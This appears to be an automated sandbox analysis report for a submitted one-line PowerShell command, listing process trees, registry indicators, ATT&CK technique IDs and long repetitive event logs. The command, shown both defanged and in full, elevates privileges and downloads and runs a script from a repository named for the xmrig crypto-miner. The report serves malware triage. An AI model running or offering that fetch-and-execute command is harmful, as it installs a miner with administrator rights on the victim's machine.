hxxp://start-process PowerShell -verb runas irm hxxps://raw[.]githubusercontent[.]com/Lachine1/xmrig-scripts/main/windows[.]ps1 iex

Resubmissions

30/06/2024, 05:33

240630-f853hathjc 1

30/06/2024, 05:27

240630-f5x8gsxepn 3

30/06/2024, 05:14

240630-fw6hhatglb 4

30/06/2024, 05:14

240630-fw1l9axekk 3

Analysis

max time kernel
2699s
max time network
2689s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
30/06/2024, 05:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 iex

Score

4^/10

defense_evasion persistence privilege_escalation

Malware Config

Signatures

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3844	msedge.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	msinfo32.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msinfo32.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133641987487005459"	chrome.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1512	msedge.exe
1512	msedge.exe
3844	msedge.exe
3844	msedge.exe
4464	identity_helper.exe
4464	identity_helper.exe
3168	msedge.exe
3168	msedge.exe
1224	sdiagnhost.exe
5048	chrome.exe
5048	chrome.exe
2400	chrome.exe
2400	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs

pid	Process
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1224	sdiagnhost.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe
Token: SeCreatePagefilePrivilege	5048	chrome.exe
Token: SeShutdownPrivilege	5048	chrome.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3452	msdt.exe
3844	msedge.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
3844	msedge.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe
5048	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3844 wrote to memory of 2620	3844	msedge.exe	77
PID 3844 wrote to memory of 2620	3844	msedge.exe	77
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1688	3844	msedge.exe	78
PID 3844 wrote to memory of 1512	3844	msedge.exe	79
PID 3844 wrote to memory of 1512	3844	msedge.exe	79
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80
PID 3844 wrote to memory of 3872	3844	msedge.exe	80

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 iex
1⤵
- Access Token Manipulation: Create Process with Token
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8c32f3cb8,0x7ff8c32f3cc8,0x7ff8c32f3cd8
  2⤵
  PID:2620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2096 /prefetch:2
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
  2⤵
  PID:3872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
  2⤵
  PID:652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:4900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
  2⤵
  PID:2628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
  2⤵
  PID:3908
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1
  2⤵
  PID:2636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
  2⤵
  PID:4312
- C:\Windows\system32\msdt.exe
  -modal "590368" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDF73A4.tmp" -ep "NetworkDiagnosticsWeb"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:3452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5881068860110334663,4210414407156643065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
  2⤵
  PID:3020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2660

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4716

C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" trace diagnose Scenario=NetworkSnapshot Mode=NetTroubleshooter
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:724

C:\Windows\System32\DataExchangeHost.exe
C:\Windows\System32\DataExchangeHost.exe -Embedding
1⤵
PID:5036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:3572

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:2332

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:4640

C:\Windows\system32\msinfo32.exe
"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\Desktop\SelectStop.nfo"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8be82ab58,0x7ff8be82ab68,0x7ff8be82ab78
  2⤵
  PID:3212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:2
  2⤵
  PID:4732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:8
  2⤵
  PID:760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2196 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:8
  2⤵
  PID:4104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:1
  2⤵
  PID:4696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3172 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:1
  2⤵
  PID:3200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4164 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:1
  2⤵
  PID:648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4344 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:8
  2⤵
  PID:4728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4480 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:8
  2⤵
  PID:764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4372 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:8
  2⤵
  PID:4684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4604 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:8
  2⤵
  PID:2608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:8
  2⤵
  PID:4996
- C:\Program Files\Google\Chrome\Application\chrome.exe
